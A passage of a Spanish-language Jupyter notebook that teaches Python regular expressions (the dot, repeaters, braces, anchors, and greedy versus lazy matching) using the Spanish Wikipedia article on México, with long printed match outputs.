ico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\n" ] ], [ [ "El resultado será una lista con todas las apariciones de la palabra \"México\" en el texto. 
Cada uno de los resultados que regresa el iterador se comporta igual que el resultado de la función `er.search()`", "_____no_output_____" ], [ "#### Punto (`.`)", "_____no_output_____" ], [ "Ahora podemos comenzar con los símbolos especiales de las expresiones regulares, comenzaremos por el punto: `.`", "_____no_output_____" ] ], [ [ "expresion_punto = re.compile(r\".\")\nbusqueda = expresion_punto.finditer(texto)\n\ncontador = 0\nfor resultado in busqueda:\n print(resultado.group(0))\n contador += 1\n if contador >= 100 :\n break", "<\nd\no\nc\n \ni\nd\n=\n\"\n1\n8\n3\n0\n\"\n \nu\nr\nl\n=\n\"\nh\nt\nt\np\ns\n:\n/\n/\ne\ns\n.\nw\ni\nk\ni\np\ne\nd\ni\na\n.\no\nr\ng\n/\nw\ni\nk\ni\n?\nc\nu\nr\ni\nd\n=\n1\n8\n3\n0\n\"\n \nt\ni\nt\nl\ne\n=\n\"\nM\né\nx\ni\nc\no\n\"\n>\nM\né\nx\ni\nc\no\nM\né\nx\ni\nc\no\n \n(\n)\n,\n \no\nf\ni\nc\ni\na\n" ] ], [ [ "El punto es capaz de coincidir con cualquier caracter, el que sea, en el código puse un límite de 100 resultados para cortar la salida, de otra manera tendrán todo el texto, un caracter a la vez.\n\nUsarlo por sí mismo no tiene mucho sentido, pero tanto letras como símbolos se pueden usar en conjunto dentro de las expresiones regulares.", "_____no_output_____" ] ], [ [ "expresion_punto = re.compile(r\"M..ic.\")\nbusqueda = expresion_punto.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(0))", 
"México\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMexica\nMejica\nMexica\nMexica\nMexica\nMexica\nMexica\nMexica\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMunici\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMexica\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMunici\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMexica\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMedici\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMexica\nMexica\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\
nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMexica\nMéxico\nMexica\nMexica\nMexica\nMexica\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\n" ] ], [ [ "Esta búsqueda nos dará direrentes coincidencias similares a \"México\", por ejemplo con y sin acento, escrito con 'j' o con una diferente terminación.", "_____no_output_____" ], [ "#### Repetidores", "_____no_output_____" ], [ "En segundo lugar, veamos los símbolos repetidores: `+ *` . 
Ambos símbolos se usan DESPUES de UN caracter que se quiera repteir: `*` cualquier cantidad de veces (incluyendo cero veces); `+` para una o más veces.", "_____no_output_____" ] ], [ [ "expresion_mas = re.compile(r\".0+\")\nexpresion_asterisco = re.compile(r\".0*\")\n\nbusqueda_mas = expresion_mas.finditer(texto)\nbusqueda_asterisco = expresion_asterisco.finditer(texto)\n\nprint(\"########## RESULTADOS MAS ########## \")\nfor resultado in busqueda_mas:\n print(resultado.group(0))\n\nprint(\"########## RESULTADOS ASTERISCO ########## \")\ncontador = 0\nfor resultado in busqueda_asterisco:\n print(resultado.group(0))\n contador += 1\n if contador >= 100 :\n break", "########## RESULTADOS MAS ########## \n30\n30\n30\n20\n 000\n300\n10\n 0\n10\n 000\n30\n 000\n9000\n 000\n8000\n1000\n10\n500\n500\n500\n200\n200\n900\n900\n900\n300\n20\n300\n40\n300\n80\n10\n20\n90\n90\n10\n20\n20\n40\n50\n60\n70\n2000\n200\n100\n 000\n20\n10\n20\n200\n20\n20\n20\n20\n500\n10\n70\n20\n70\n80\n2000\n200\n20\n80\n50\n50\n20\n20\n20\n 0\n30\n10\n90\n40\n20\n50\n30\n50\n40\n10\n20\n1000\n500\n500\n50\n70\n60\n80\n1000\n3000\n30\n200\n 000\n10\n90\n 000\n500\n70\n 000\n200\n20\n20\n10\n30\n10\n20\n 000\n10\n40\n70\n70\n30\n200\n200\n70\n100\n 000\n70\n 000\n200\n20\n 000\n200\n200\n 0\n 0\n200\n600\n700\n200\n20\n10\n20\n80\n 000\n200\n200\n200\n10\n80\n40\n70\n200\n200\n20\n20\n200\n70\n200\n20\n200\n20\n10\n5000\n20\n 0\n20\n10\n 0\n 0\n60\n200\n200\n30\n900\n5000\n200\n50\n200\n 000\n50\n 000\n400\n20\n200\n200\n 000\n 000\n 0\n200\n10000\n40\n 000\n20\n10\n80\n20\n10\n20\n20\n10\n200\n90\n80\n200\n30\n200\n40\n20\n100\n100\n20\n10\n20\n30\n80\n50\n80\n2000\n20\n2000\n2000\n90\n60\n50\n20\n90\n80\n50\n200\n20\n10\n40\n 000\n600\n40\n400\n 000\n10\n10\n20\n 000\n2000\n100\n20\n80\n20\n20\n,000\n20\n20\n200\n20\n20\n20\n20\n90\n20\n10\n30\n5000\n 000\n500\n400\n100\n10\n50\n500\n5000\n5000\n50\n 000\n 000\n100\n 000\n400\n500\n20\n10\n20\n10\n30\n 
000\n200\n20\n40\n70\n200\n20\n10\n10\n100\n20\n10\n10\n2000\n40\n70\n30\n40\n60\n50\n60\n70\n80\n70\n90\n20\n40\n50\n60\n500\n200\n20\n80\n40\n50\n200\n20\n 000\n200\n20\n10\n200\n200\n20\n 0\n20\n20\n10\n20\n10\n30\n20\n10\n70\n10\n200\n20\n200\n20\n20\n20\n200\n200\n200\n20\n20\n20\n20\n20\n20\n30\n20\n10\n90\n20\n50\n200\n20\n10\n200\n20\n900\n2000\n200\n200\n200\n200\n70\n20\n90\n20\n70\n20\n20\n200\n20\n10\n80\n2000\n200\n200\n20\n200\n20\n10\n20\n10\n20\n########## RESULTADOS ASTERISCO ########## \n<\nd\no\nc\n \ni\nd\n=\n\"\n1\n8\n30\n\"\n \nu\nr\nl\n=\n\"\nh\nt\nt\np\ns\n:\n/\n/\ne\ns\n.\nw\ni\nk\ni\np\ne\nd\ni\na\n.\no\nr\ng\n/\nw\ni\nk\ni\n?\nc\nu\nr\ni\nd\n=\n1\n8\n30\n\"\n \nt\ni\nt\nl\ne\n=\n\"\nM\né\nx\ni\nc\no\n\"\n>\nM\né\nx\ni\nc\no\nM\né\nx\ni\nc\no\n \n(\n)\n,\n \no\nf\ni\nc\ni\na\nl\nm\n" ] ], [ [ "Nuevamente le puse un límite a la salida de la expresión regular, o de lo contrario tendremos el texto completo un caracter a la vez (casi). ¿Por qué? porque el punto coincide con cualquier cosa, y si no tiene un cero a su derecha, no importa (por el asterisco), aún así va a coincidir. Si, por el contrario, si tiene ceros a la derecha, entonces va a coincidir con todos los que pueda y habrá mas de un caracter a la salida.\n\nA diferencia de la primera expresión regular, en donde se requiere que exista al menos un cero, pero puede haber más.", "_____no_output_____" ], [ "Es posible que busquemos que el elemento que se repite solo lo haga una cantidad específica de veces. Para esos casos, lo que se necesita son llaves: `{ }` . Dentro de las llaves se coloca el número de veces que se busca que se repita el caracter anterior. 
Tiene tres opciones: número fijo; rango o rango abierto (mínimo de veces).", "_____no_output_____" ] ], [ [ "# Se va a buscar mínimo 2 nueves, si se coloca un número después de la coma es un rango\n# y sin coma es una cantidad fija de repeticiones\nexpresion_llaves = re.compile(r\".9{2,}.\")\nbusqueda = expresion_llaves.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(0))", "1994\n1994\n1994\n1997\n1994\n1994\n1995\n 990\n1990\n1995\n1990\n1993\n1992\n1994\n1999;\n1993\n1990\n1992\n1992\n1990\n1994\n1996\n1992\n1994\n1992\n1996\n" ] ], [ [ "Aquí también vale la pena hablar de otro símbolo similar: `?`. No es exactamente un repetidor ya que solo acepta 0 o 1 aparición, es decir, hace que un caracter sea opcional.", "_____no_output_____" ] ], [ [ "expresion_interrogacion = re.compile(r\"años?\")\nbusqueda = expresion_interrogacion.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(0))", "año\naños\naños\naños\naño\naño\naño\naño\naño\naño\naños\naño\naño\naño\naño\naño\naño\naño\naños\naño\naño\naño\naño\naño\naño\naño\naños\naño\naño\naño\naños\naños\naño\naño\naño\naño\naños\naños\naños\naño\naño\naños\naños\naños\naño\naño\naño\naños\naño\naños\naño\naño\naño\naño\naño\naños\naños\naños\naños\naño\naño\naño\naños\naño\naños\naños\naño\naño\naño\naño\naño\naño\naño\naño\naños\naño\naño\naños\naño\naños\naños\naño\naños\naño\naños\naño\naños\naños\naño\naño\naños\naños\naño\naño\naño\naño\naño\naño\naño\naños\naño\naño\naño\naño\naño\naño\naños\naño\naños\naños\naño\naño\naño\naño\naño\naño\naños\naño\naños\naños\naños\naños\naños\naños\naño\naños\naños\naño\naño\naño\naño\naño\naños\naños\naño\naño\naño\naños\naños\naños\naño\naño\naño\naño\naño\naño\naño\naño\naño\naño\naños\naños\naño\naño\naños\naños\naños\n" ] ], [ [ "#### Posición", "_____no_output_____" ], [ "Las expresiones regulares también tienen símbolos especiales para indicar posición, en particular podemos hablar del inicio y final del texto. 
La versión, en expresión regular, de las funciones `s.startswith()` y `s.endswith()`. Los símbolos son `^` y `$` respectivamente", "_____no_output_____" ] ], [ [ "# Es mejor manejar el texto segmentado para este experimento\nsegmentado = texto.split(\"\\n\")\n\nexpresion_inicio = re.compile(r\"^......\")\nexpresion_fin = re.compile(r\"......$\")\n\nfor segmento in segmentado:\n resultado_inicio = expresion_inicio.search(segmento)\n resultado_fin = expresion_fin.search(segmento)\n\n if resultado_inicio and resultado_fin:\n\n print(resultado_inicio.group(0))\n print(resultado_fin.group(0))\n\n print(\"############\")", "<doc i\nxico\">\n############\nMéxico\nMéxico\n############\nMéxico\neral).\n############\nEl ter\n con .\n############\nMéxico\nmundo.\n############\nLa pre\nítico.\n############\nSegún \nundo. \n############\nEn tér\nmundo,\n############\nMéxico\nmicas.\n############\nEl pri\nulos. \n############\nLos do\nncia. \n############\nDesde \ncomún.\n############\nEl gen\ncanos.\n############\n\"Méxic\nforma:\n############\nFranci\ntecas.\n############\nEl ter\nérica.\n############\nLos oa\nuahua.\n############\nLos ha\n. 
C.).\n############\nEl ini\ngodón.\n############\nLos ol\nticas.\n############\nEl cen\nVenta.\n############\nLa Ven\nirlas.\n############\nEl cen\niores.\n############\nSe pie\niapas.\n############\nEl per\nTikal.\n############\nLas ci\nrinos.\n############\nTeotih\nteca).\n############\nLos ar\nguras.\n############\nLos te\nellos.\n############\nLos te\nioses:\n############\nSe des\nernos.\n############\nEn su \nicios.\n############\nLos ar\nguras.\n############\nLa ciu\nAlbán.\n############\nTeotih\ncóatl.\n############\nLa cul\n cero.\n############\nHabitó\n tres:\n############\nLos ma\nuerte.\n############\nEn su \nuerra.\n############\nPor ra\nbismo.\n############\nLa rel\nerte).\n############\nLas ci\nación.\n############\nLos ma\nlifos.\n############\nOtros \nillas.\n############\nLos ma\nscado.\n############\nLa cul\nricos.\n############\nSu ciu\nAlbán.\n############\nLa soc\ndades.\n############\nTenían\narios:\n############\nEran p\n eran:\n############\nLa soc\nuerra.\n############\nEl per\nicios.\n############\nLa cul\nlenta.\n############\nOtra c\nxteca.\n############\nHacia \niosas.\n############\nLa cul\nñoles.\n############\nDespué\njeros.\n############\nLos es\nural\".\n############\nUna ve\nspaña.\n############\nEn 152\n1761).\n############\nLa bas\nperio.\n############\nEl com\nitido.\n############\nEl vir\nmicos.\n############\nLa soc\nla fe.\n############\nEl ter\ntecas.\n############\nA pesa\nlidad.\n############\nLa ocu\nlados.\n############\nEl mov\n 1815.\n############\nA part\n 1821.\n############\nDespué\nntral.\n############\nEl Con\ngimen.\n############\nEl pre\n 1848.\n############\nMéxico\nierno.\n############\nLa pro\nétaro.\n############\nBenito\ncatán.\n############\nAlguno\nltado.\n############\nEn feb\n1923).\n############\nCarran\nndial.\n############\nDurant\nstado.\n############\nAl fin\nación.\n############\nSalió \nnidad.\n############\nSu obj\nEZLN).\n############\nEn 200\nocial.\n############\nEl 
exj\ndores.\n############\nMéxico\ns dos.\n############\nEl sis\n INAI)\n############\nEl Pre\nmadas.\n############\nEs ele\n-2024.\n############\nLa vig\nrales.\n############\nEl Con\nores–.\n############\nLa vig\nales. \n############\nLas fa\n IFT).\n############\nLas fa\nional.\n############\nEl Pod\n etc.)\n############\nLa Sup\nderes.\n############\nLa vig\niones.\n############\nLas en\nopios.\n############\nLos es\nopias.\n############\nLa org\nnomos.\n############\nLos es\nlo 5. \n############\nAl mis\niento.\n############\nTambié\nitana.\n############\nLa Ciu\nodo lo\n############\nconcer\nestos.\n############\nLa act\nipios.\n############\nLa rep\nales. \n############\nEn el \nistro.\n############\nEn su \nerior.\n############\nEn muc\n país.\n############\nA lo l\nragua.\n############\nDesde \ncanas.\n############\nMéxico\nnesco.\n############\nEl paí\nversa.\n############\nLas Fu\nlica. \n############\nEstán \nxico).\n############\nEl \"Ma\nrales.\n############\nEsta e\nndial.\n############\nPara e\nSEMAR.\n############\nMéxico\nnidos.\n############\nEl paí\ndades.\n############\nEl rel\nicana.\n############\nEl ter\nl Sur.\n############\nEl Eje\nmundo.\n############\nLas pr\n17 m).\n############\nLos ac\nllana.\n############\nUbicad\nicana.\n############\nEntre \niones.\n############\nRepart\n73km².\n############\nMéxico\n país.\n############\nDe est\netros.\n############\nEl cli\nñosas.\n############\nUn seg\ncatán.\n############\nEl tró\néxico.\n############\nLas zo\nticas.\n############\nLa est\n00 mm.\n############\nEl pro\nremas.\n############\nLos rí\néxico.\n############\nEn el \ngable.\n############\nMéxico\naxaca.\n############\nMéxico\nndial.\n############\nMéxico\ntemas.\n############\nEn Méx\ncies).\n############\nUno de\nlo XX.\n############\nDurant\niglos.\n############\nEl pro\nrutos.\n############\nA fina\nación.\n############\nEn ese\nicano.\n############\nTras e\nicano.\n############\nSin em\nidos).\n############\nLa 
era\nterna.\n############\nLos re\nríodo.\n############\nNo obs\nlares.\n############\nAsimis\nrismo.\n############\nLos an\ne año.\n############\nLa cre\nabajo.\n############\nDe las\nsonas.\n############\nAdemás\nlares.\n############\nLa mac\niales.\n############\nSegún \nmicas.\n############\nConfor\nicano.\n############\nAdemás\nrasil.\n############\nSin em\nróleo.\n############\nDesde \nJapón.\n############\nMéxico\nmicas.\n############\nLa ind\nérica.\n############\nA fina\nrrano.\n############\nEn jun\ntarlo.\n############\nEn feb\nervas.\n############\nEl tur\nnidos.\n############\nLas pr\nativa.\n############\nEn la \nicano.\n############\nLa Sec\nnores.\n############\nDebido\nentes.\n############\nEl ent\n país.\n############\nAunque\nLucas.\n############\nMéxico\nbreza.\n############\nEn Méx\nbreza.\n############\nPor ot\no año.\n############\nSegún \nmedio.\n############\nEn Méx\nolera.\n############\nLa pri\nr kWh.\n############\nMéxico\nrieto.\n############\nSegún \ntrica.\n############\nEn Méx\nctual.\n############\nLa lon\npulco.\n############\nRecien\naneca.\n############\nLa may\ngicos.\n############\nComo e\néxico.\n############\nEl 14 \niales.\n############\nComo l\nífico.\n############\nLos me\nional.\n############\nEn rad\nulada.\n############\nLa tel\nvadas.\n############\nEn lo \n país.\n############\nLas pr\nradio.\n############\nMéxico\nCarso.\n############\nEn Méx\nonal».\n############\nExiste\netro\".\n############\nEn Méx\nabado.\n############\nLas pr\niente:\n############\nHay un\nseis).\n############\nEn alg\nncias.\n############\nLa rad\ns son:\n############\nEn Méx\nntran:\n############\nEl ser\nlemas:\n############\nDurant\nicana.\n############\nLa tas\n2000).\n############\nTambié\noense.\n############\nLas ár\n como:\n############\nCabe s\nipios.\n############\nPocas \ncruz).\n############\nLa sig\n 2010.\n############\nSi se \nsonas.\n############\nMéxico\nyente.\n############\nLa pol\ncanos.\n############\nEl 
cri\nundo\".\n############\nLas ci\notros.\n############\nLa com\nantes.\n############\nEn Méx\naxaca.\n############\nSobre \notras.\n############\nLa inm\nubros.\n############\nMéxico\nonora.\n############\nInicia\nicano.\n############\nMéxico\n 2016.\n############\nMéxico\nlosos.\n############\nCifras\n 2019:\n############\nCifras\n2020: \n############\nMéxico\nólico.\n############\nLa déc\nítica.\n############\nSegún \n2010).\n############\nLa seg\ndoxas.\n############\nSegún \nnuevo.\n############\nLa pro\nNEGI).\n############\nEn cie\ndalgo.\n############\nUn arg\nniños.\n############\nExiste\npañol.\n############\nEs tam\nancún.\n############\nEn el \n país.\n############\nEn muc\n, etc.\n############\nEl imp\nistas.\n############\nLa Ley\nntero.\n############\nUn 7% \ningüe.\n############\nDebido\nmundo.\n############\nDe las\noacia.\n############\nOtro c\npeche.\n############\nEl fra\niacán.\n############\nSe tie\najara.\n############\nLa cif\nngües.\n############\nExiste\npañol.\n############\nSalvo \nticia.\n############\nSe est\njuana.\n############\nHasta \ncanos.\n############\nEn 201\n país.\n############\nMéxico\nzteca.\n############\nLa Con\n 1921.\n############\nMéxico\nlador.\n############\nEn el \n país.\n############\nEl 21 \n país.\n############\nEl Him\ntoria.\n############\nEn tér\nicana.\n############\n\"Lo me\nicano.\n############\nLa con\nedad\".\n############\nAlguno\nético:\n############\nEn el \n años.\n############\nLa ópe\nistas.\n############\nDesde \notros.\n############\nLa dif\ncanos.\n############\nAlguno\nnchez.\n############\nLa mús\notros.\n############\nIntern\nbriel.\n############\nEl son\nruana.\n############\nEl \"ja\n, etc.\n############\nA prin\no XIX.\n############\nEl bol\nridad.\n############\nDentro\nllano.\n############\nOtras \ncales.\n############\nLa mús\nticas.\n############\nLa mús\ncampo.\n############\nEl mar\nisión.\n############\nLa mús\nzador.\n############\nLa mús\n país.\n############\nLa 
dan\nores).\n############\nDurant\nxcala.\n############\nDurant\ngenas.\n############\nDe tod\nailes.\n############\nLa lit\nómica.\n############\nEn el \notros.\n############\nLas et\ncelos.\n############\nLa pin\nAlbán.\n############\nLa pin\nocino.\n############\nPor un\nistas.\n############\nLa pin\nuelas.\n############\nLa pin\no XXI.\n############\nAlguno\nficos.\n############\nA lo l\nngton.\n############\nLa esc\ngioso.\n############\nA part\nropeo.\n############\nEl rom\nropia.\n############\nDurant\nngton.\n############\nLa pre\nental.\n############\nEl urb\nkbés\".\n############\nCon la\nrabes.\n############\nEn el \nánica.\n############\nLa arq\njismo.\n############\nLa Esc\nional.\n############\nLa arq\nional.\n############\nLos ob\npular.\n############\nAlguna\ns son:\n############\nLas pe\nueroa.\n############\nCabe m\nnjera.\n############\nEl cin\nbezki.\n############\nEl pri\norias.\n############\nEn 200\nnidad.\n############\nEl ori\ncanos.\n############\nDe ese\n país.\n############\nAlguna\nquila.\n############\nLa his\néxico.\n############\nLas in\nabaza.\n############\nLas to\ncanas.\n############\nMuchas\nrveza.\n############\nSegún \niento.\n############\nMéxico\nNobel:\n############\nEn Méx\naxaca.\n############\nLa ley\nN.A.H.\n############\nA fina\néxico.\n############\nDe acu\nl PIB.\n############\nEl 20 \n 2010.\n############\nCon fr\nitiva.\n############\nAlguno\nn aro.\n############\nSi bie\nONEFA.\n############\nEl dep\nmenil.\n############\nLa sel\nnados.\n############\nLa sel\n 2007.\n############\n\"Nota.\nbol\".\"\n############\nOtro d\ncanas.\n############\nOtras \n\"LMP\".\n############\nEn el \ntalia.\n############\nEn la \n 1951.\n############\n\"Nota.\nbol\".\"\n############\nEl seg\n 1936.\n############\nEn el \n 1955.\n############\n\"Nota.\nbol\".\"\n############\nEn el \nétaro.\n############\nDe for\nporte.\n############\nLa Lig\néxico.\n############\nLa pel\ntotal.\n############\nBasta \n 1990.\n############\nEn la 
\nnales.\n############\nLa Fed\nonil).\n############\nLa Ciu\nmundo.\n############\nEs la \ntenis.\n############\nMéxico\n 1992.\n############\nEl box\nblico.\n############\nLa fie\néxico.\n############\nOtros \nuárez.\n############\nMéxico\nortes.\n############\nMéxico\n 2008.\n############\nEntre \níguez.\n############\nAsimis\nstado.\n############\nDesde \nencia.\n############\nPese a\néxico.\n############\nMéxico\nSmaga.\n############\nOtras \no son:\n############\nGuille\nParís.\n############\nPor ot\nables.\n############\nMéxico\nleton.\n############\nMéxico\nedrez.\n############\n</doc>\n</doc>\n############\n" ] ], [ [ "Si no segmentamos el texto, solamente vamos a obtener los primeros y últimos seis caracteres de todo el texto, de esta manera obtenermos los primeros y últimos de cada línea.", "_____no_output_____" ], [ "#### Miscelaneos", "_____no_output_____" ], [ "Lamentablemente, los símbolos que quedan tienen todos efectos particulares y ya no los pude agrupar más. Pero vamos a empezar con uno que ya conocemos: `?`. Porque puede tener otro significado que el que vimos; el signo de interrogación puede ser usado junto con los símbolos repetidores y cambia su comportamiento.", "_____no_output_____" ] ], [ [ "expresion_sinInterrogacion = re.compile(r\"\\(.*\\)\")\nexpresion_conInterrogacion = re.compile(r\"\\(.*?\\)\")\n\nbusqueda_sinInterrogacion = expresion_sinInterrogacion.finditer(texto)\nbusqueda_conInterrogacion = expresion_conInterrogacion.finditer(texto)\n\nfor resultado in busqueda_sinInterrogacion:\n print(resultado.group(0))\n\nprint('''\n ############\n ############\n ############\n''')\n\nfor resultado in busqueda_conInterrogacion:\n print(resultado.group(0))", "(), oficialmente Estados Unidos Mexicanos, es un país soberano ubicado en la parte meridional de América del Norte con capital en la Ciudad de México. 
Políticamente es una república representativa, democrática, federal y laica, compuesta por 32 entidades federativas (31 estados y la capital federal)\n(principalmente el segundo tercio)\n(PIB) es la decimocuarta economía mundial y la undécima por (PPA)\n(Capitanía General de Guatemala, Cuba, Florida, Puerto Rico y la parte española de la isla de Santo Domingo —hoy República Dominicana—), asumiendo con ello, que ese era el espacio geográfico sobre el cual se constituiría la nueva nación.Posteriormente el Decreto Constitucional para la Libertad de la América Mexicana del 22 de octubre de 1814 cambió dicha denominación, adaptándola con el término \"México\" (usado como adjetivo)\n(Plan de Iguala y Tratados de Córdoba), usaron los dos términos antes mencionados (América Septentrional y América Mexicana)\n(s. XVI) —quien es la fuente documental más antigua—, el vocablo significaría «el lugar de Mexi», de «\"Mexitl\"» donde «\"metl\"» (maguey), «\"citli\"»/«\"xitli\"» (liebre) y «\"-co\"» (locativo): Mexi o Mexitl, quien fuera un legendario sacerdote nahua, guió a sus seguidores por la búsqueda de un águila sobre un nopal para la fundación de su ciudad luego de abandonar la también legendaria locación de Aztlán. Sin embargo, actualmente la versión más extendida sobre el significado del vocablo es: «el ombligo de la luna» o «en el lugar del lago de la Luna», de «\"Metzxico\"»: «\"metz(tli)\"» (luna), «\"xic(tli)\"» (ombligo, centro) y «\"-co\"» (locativo)\n(12 000 a. C.) Cueva de la Candelaria (8000 a. C.), El Conchalito (1000 a. C.) y las cuevas de la Sierra de San Francisco (10 500 a. C.)\n(siglos XV-IV a. C.)\n(Estado de México)\n(Que significa «serpiente emplumada») y Tláloc (que significa: «néctar de la tierra», aunque a este Dios también lo veneraban en la cultura maya y zapoteca)\n(teocracia); sus dioses se relacionaban con los elementos naturales, los astros y las acciones humanas. 
Entre los dioses que sobresalieron esta: Hanub Kú (el dios creador de los mayas quiches), Itzamná (el dios creador de los mayas yucatecos), Ix Chebel Ya (dios del bordado y la pintura), Kakalcán (Quetzalcóatl) (dios del viento), Kin (dios del sol), Ixchel (diosa de la luna), Chac (dios del agua), Yum Kaax (dios del maíz y la agricultura), Ah Puch (dios de la muerte)\n(o aztecas)\n(1517) y Juan de Grijalva (1518)\n(1546), la Guerra del Mixtón (1540-1551), Rebelión de los Pericúes (1734-1737) y la rebelión de los mayas de Cisteil (1761)\n(notoriamente, Zacatecas y Guanajuato)\n(golfo de México) y Acapulco (océano Pacífico)\n(también llamado Monte Pío)\n(en especial desde la llegada de los Borbones, que propugnaron el modelo francés de colonización, contra los cuales los criollos o hijos de españoles nacidos en México empezaron a resentirse)\n(Guanajuato)\n(en cualquiera de sus variantes como bandos antagónicos: republicanos contra monárquicos y federalistas contra centralistas)\n(los actuales estados de California, Arizona, Nuevo México, Nevada y Utah; y porciones de Colorado, Oklahoma, Kansas y Wyoming). Al terminar la guerra prosiguieron los enfrentamientos entre facciones políticas, lo que propició la llegada por undécima y última ocasión de Santa Anna al poder (1853-1855)\n(1906) y Río Blanco (1907)\n(Tlaxcalantongo, 1920), Zapata (Chinameca, 1919) y Villa (Parral, 1923)\n(PNR), antecedente del Partido Revolucionario Institucional (PRI). En 1934 fue electo presidente Lázaro Cárdenas del Río para el primer período sexenal (1934-1940)\n(1988-1994)\n(CCRI-CG) del EZLN. El 22 de diciembre de 1997 45 indígenas tzotziles fueron asesinados mientras oraban en una iglesia de la comunidad de Acteal, en el estado de Chiapas. 
